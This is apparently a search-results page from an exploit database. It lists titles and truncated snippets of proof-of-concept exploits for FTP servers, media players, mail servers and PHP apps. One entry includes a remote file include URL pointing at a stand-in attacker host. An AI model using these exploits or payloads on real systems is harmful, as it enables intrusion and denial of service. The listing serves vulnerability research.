1325 matches found
OneOrZero Helpdesk 1.4 Install.PHP Administrative Access Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7611/info OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. The issue presents itself due to a programming error in a Helpdesk script...
GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC
No description provided by source. !/usr/bin/python + Author: TUNISIAN CYBER + Exploit Title: GOMMP 2.2.56.5183 Memory Corruption PoC + Date: 22-03-2014 + Category: DoS/PoC + Tested on: WinXp/Windows 7 Pro + Vendor: http://player.gomlab.com/eng/ + Friendly Sites: na3il.com,th3-creative.com +...
mcrypt <= 2.6.8 stack-based buffer overflow PoC
No description provided by source. !/usr/bin/env python mcrypt = 2.6.8 stack-based buffer overflow poc http://mcrypt.sourceforge.net/ the command line tool, not the library date: 2012-09-04 exploit author: ishikawa tested on: ubuntu 12.04.1 tech: it overflows in checkfilehead when decrypting .nc...
FtpXQ FTP Server 3.0 - Remote Denial of Service Exploit (auth)
No description provided by source. !/usr/bin/python print print Iranian Pentesters Home print Www.Pentesters.Ir print PLATEN - H.jafari - print FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit print author: PLATEN print E-mail && blog: print hjafari.blogspot.com print...
iOS FTP On The Go 2.1.2 - HTTP Remote DoS
No description provided by source. !/usr/bin/python Apple Iphone/Ipod - FTP On The Go 2.1.2 - HTTP Remote Denial-of-Service Attack Found by: TecR0c Homepage: http://www.ftponthego.com/ Download: From the Apple App Store - http://app2.it/topapp/286479936 Tested on: IPhone 3G - firmware 3.1.2...
BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)
No description provided by source. !/usr/bin/python BigAnt Server 2.52 remote buffer overflow exploit 2 Author: DouBleZer0 Vulnerability discovered by Lincoln a another version of the original exploit by Lincoln application is little hazy.. import sys,socket host = sys.argv1 buffer= \x90 20...
Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit
No description provided by source. !/usr/bin/env python print 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /\ /\ \ /\ /\ /\ \ /\ 0 0 /:/ / /::\ \ /:/ / /:/ / /::\ \ /:/ / 1 1 /:// /:/:\ \ /:/ / /:/ / /:/:\ \ /:// 0 0 /::\ \ /::\:\ \ /:/ / /:/ / /:/ :...
Blackmoon FTP 3.1 Build 1735,1736 DoS
No description provided by source. !/usr/bin/python Exploit Title: BlackmoonFTP Server DOS Date: 12/28/2010 Author: Craig Freyman cd1zz Software Link: http://www.mediafire.com/?bnc4d00myymmx55 Version: 3.1 Release 6 - Build 1735 and 1736 Tested On: Windows XP SP3 Vendor Contacted: 12/28/2010 Vend...
FlatNuke 2.5.7 Index.php Remote File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class FlatNukeRemoteFileIncludePOCBase: vulID = '63616' version = '1' vulDate = '2006-07-13' author = ' '...
Linux write() & exit(0) shellcode genearator with customizable text
No description provided by source. !/usr/bin/python Linux write & exit0 shellcode genearator with customizable text Usage: ./generator msg Author: Stoke Tested on: Ubuntu 8.10 E-mail: stoke95atyahoodotit Web: hack2web.altervista.org Visit: blasterhacking.forumcommunity.net import re, sys def...
ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit
No description provided by source. ESET Smart Security 4.2 and NOD32 Antivirus 4.2 x32-x64 LZH archive parsing PoC exploit. Scanning of malicious file causes heap corruption in context of the service process ekrn.exe. See Dr. Watson log drwtsn32.log for details. USAGE: python esetlzh.py TEST.LZH...
Vinagre < 2.24.2 show_error() Remote Format String PoC
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Vinagre showerror format string vulnerability 1. Advisory Information Title: Vinagre showerror format string vulnerability Advisory...
Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit
No description provided by source. !/usr/bin/env python Ekiga GetHostAddress Remote Denial of Service Vulnerability CVE-2007-4897 ekiga207dos.py by Jose Miguel Esparza 2007-09-11 S21sec labs import sys,socket if lensys.argv != 3: sys.exitUsage: + sys.argv0 + targethost targetport\n target =...
IceWarp Merak Mail Server 9.4.1 'Forgot Password' Input Validation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/34827/info IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function. Attackers can exploit this issue via social-engineering...
Easy FTP Server 1.7.0.2 - CWD Remote BoF
No description provided by source. Tested on: XP SP3 Eng !/usr/bin/python import socket, sys print Easy FTP Server 1.7.0.2 Remote BoF Discovered by: athleet jonbutler88atgooglemaildotcom if lensys.argv != 3: print Usage: ./easyftp.py Target IP Port sys.exit1 target = sys.argv1 port = intsys.argv2...
RedBlog 0.5 Index.PHP Remote File Include Vulnerability
RedBlog 0.5 Index.PHP 远程文件包含漏洞 漏洞类型: 输入验证错误 漏洞危害: 攻击者可以利用该漏洞执行远程php文件,从而攻击RedBlog甚至控制 服务器 exp: http://www.example.com/Path/index.php?rootpath==http://evilscripts? 解决方案: 厂商没有提供补丁,推荐使用加速乐: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...
Quick Player 1.3 Unicode SEH Exploit
No description provided by source. Quick Player 1.3 Unicode SEH Exploit Author Abhishek Lyall and Puneet Jain [email protected] , abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Download Vulnerable...
McNews 1.x Install.PHP Arbitrary File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class McNewsRemoteFileIncludePOCBase: vulID = '78899' version = '1' vulDate = '2005-03-17' author = ' '...
NIBE heat pump LFI exploit
No description provided by source. !/usr/bin/python import socket,sys,os,base64 NIBE heat pump LFI exploit Written by Jelmer de Hen Published at http://h.ackack.net/?p=302 Special thanks to Fredrik Nordberg Almroth and Mathias Karlsson for obtaining this information http://h.ackack.net/?p=274 whi...
Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe
No description provided by source. !/usr/bin/env python Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow Discovered by babi Reference: http://www.exploit-db.com/exploits/11288 Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv1 except: print usage: +...